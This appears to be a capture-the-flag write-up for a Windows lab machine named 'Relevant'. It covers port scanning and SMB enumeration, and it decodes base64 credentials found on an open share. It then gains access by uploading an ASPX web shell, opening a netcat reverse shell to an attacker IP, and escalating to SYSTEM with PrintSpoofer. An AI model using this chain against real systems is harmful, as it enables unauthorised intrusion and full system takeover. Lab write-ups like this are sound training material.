Relevant
Enumeration
Lets start with nmap and threader3000
I will use threader300 to check all open ports before running nmap to reduce scan times:
------------------------------------------------------------
Threader 3000 - Multi-threaded Port Scanner
Version 1.0.7
A project by The Mayor
------------------------------------------------------------
Enter your target IP address or URL here: <MACHINE_IP>
------------------------------------------------------------
Scanning target <MACHINE_IP>
Time started: 2021-05-07 13:03:58.365964
------------------------------------------------------------
Port 139 is open
Port 80 is open
Port 135 is open
Port 445 is open
Port 3389 is open
Port 49663 is open
Port 49667 is open
Port 49669 is open
Port scan completed in 0:01:39.791011
nmap -sV -sC -p139,80,135,445,3389,49663,49667,49669 -oN nmapScan.txt <MACHINE_IP>
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-07 13:07 EDT
Nmap scan report for <MACHINE_IP>
Host is up (0.20s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp open ms-wbt-server?
| rdp-ntlm-info:
| Target_Name: RELEVANT
| NetBIOS_Domain_Name: RELEVANT
| NetBIOS_Computer_Name: RELEVANT
| DNS_Domain_Name: Relevant
| DNS_Computer_Name: Relevant
| Product_Version: 10.0.14393
|_ System_Time: 2021-05-07T17:09:00+00:00
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2021-05-06T16:58:58
|_Not valid after: 2021-11-05T16:58:58
|_ssl-date: 2021-05-07T17:09:40+00:00; +1s from scanner time.
49663/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h24m01s, deviation: 3h07m50s, median: 0s
| smb-os-discovery:
| OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
| Computer name: Relevant
| NetBIOS computer name: RELEVANT\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-05-07T10:09:02-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-07T17:09:03
|_ start_date: 2021-05-07T16:59:34
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 123.79 seconds
So RDP server, 2 web servers and SMB. The RDP server looks like is protected with a password and both web server looks like the default page of ISS (TRACE method allowed but not much more), so lets check SMB
SMB
I will use enum4linux to enum the service to get additional information to the already gathered by nmap:
enum4linux -a -u guest -w WORKGROUP <MACHINE_IP> 255 ⨯
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri May 7 12:09:27 2021
==========================
| Target Information |
==========================
Target ........... <MACHINE_IP>
RID Range ........ 500-550,1000-1050
Username ......... 'guest'
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=====================================================
| Enumerating Workgroup/Domain on <MACHINE_IP> |
=====================================================
[+] Got domain/workgroup name: WORKGROUP
=============================================
| Nbtstat Information for <MACHINE_IP> |
=============================================
Looking up status of <MACHINE_IP>
No reply from <MACHINE_IP>
======================================
| Session Check on <MACHINE_IP> |
======================================
[+] Server <MACHINE_IP> allows sessions using username 'guest', password ''
============================================
| Getting domain SID for <MACHINE_IP> |
============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
=======================================
| OS information on <MACHINE_IP> |
=======================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for <MACHINE_IP> from smbclient:
[+] Got OS info for <MACHINE_IP> from srvinfo:
<MACHINE_IP> Wk Sv NT SNT
platform_id : 500
os version : 10.0
server type : 0x9003
==========================================
| Share Enumeration on <MACHINE_IP> |
==========================================
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
nt4wrksv Disk
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on <MACHINE_IP>
//<MACHINE_IP>/ADMIN$ Mapping: DENIED, Listing: N/A
//<MACHINE_IP>/C$ Mapping: DENIED, Listing: N/A
//<MACHINE_IP>/IPC$ [E] Can't understand response:
NT_STATUS_INVALID_INFO_CLASS listing \*
//<MACHINE_IP>/nt4wrksv Mapping: OK, Listing: OK
=====================================================
| Password Policy Information for <MACHINE_IP> |
=====================================================
[E] Unexpected error from polenum:
[+] Attaching to <MACHINE_IP> using guest
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:<MACHINE_IP>)
[+] Trying protocol 445/SMB...
[!] Protocol failed: rpc_s_access_denied
[E] Failed to get password policy with rpcclient
===============================
| Groups on <MACHINE_IP> |
===============================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
========================================================================
| Users on <MACHINE_IP> via RID cycling (RIDS: 500-550,1000-1050) |
========================================================================
[I] Found new SID: S-1-5-21-3981879597-1135670737-2718083060
[I] Found new SID: S-1-5-82-3876422241-1344743610-1729199087-774402673
[I] Found new SID: S-1-5-82-3006700770-424185619-1745488364-794895919
[I] Found new SID: S-1-5-82-271721585-897601226-2024613209-625570482
[I] Found new SID: S-1-5-82-2094419441-2301267808-272098454-1219398644
[I] Found new SID: S-1-5-80-3139157870-2983391045-3678747466-658725712
[I] Found new SID: S-1-5-80
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username 'guest', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
Lets check that nt4wrksv share: smbclient -N //<MACHINE_IP>/nt4wrksv. Once connected I found a file called passwords.txt cool:
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
Looks like base64 lets get them in clear:
Bob - !P@$$W0rD!123
Bill - Juw4nnaM4n420696969!$$$
I tried the passwords but no luck, maybe they are valid usernames but the passwords are useless, lets check the web page.
http://MACHINE_IP/
gobuster couldn't find anything and nikto only reported the TRACE method i commented earlier as something "interesting" so lets check the other page.
http://MACHINE_IP:49663/
nikto only reported the TRACE method again but gobuster reported /nt4wrksv path, the same as the SMB share. Maybe it is connected to it? I tried the path /nt4wrksv/passwords.txt and the page showed the file content, ok nice.
Exploiting
RCE
We have access to that share so... can we get a RCE? I uploaded cmdasp.aspx and there it was, allowing me to execute commands nice.
Now I will try to upload nc.exe to the share and get a proper reverse shell.
Reverse shell!
First I had to find the directory, I was pretty lucky and I found it fast:
dir C:\inetpub\wwwroot\nt4wrksv
nc.exe -e cmd.exe <Attacker_IP> <PORT> with a netcat listener in our site. After some try and error I tried with the port 443 to avoid possible firewalls aaaand the shell came back cool.
User flag
The user flag was in Bob directory. Just execute more C:\Users\Bob\Desktop\user.txt:
THM{*******************************}
Privesc
I tried to execute winpeas to check for privesc vectors but to be honest wasn't a good idea. I don't know why but this box is really slow sometimes and it hanged. Sooo i tried some manual enumeration:
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled <----
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
That SeImpersonatePrivilege thing looks interesting, after searching a bit i found this exploit: https://github.com/itm4n/PrintSpoofer. I uploaded it to the machine and executed it:
C:\inetpub\wwwroot\nt4wrksv>PrintSpoofer.exe -i -c cmd
PrintSpoofer.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
And yep, a system shell cool.
Root flag
Just execute more C:\Users\Administrator\Desktop\root.txt:
THM{*******************************}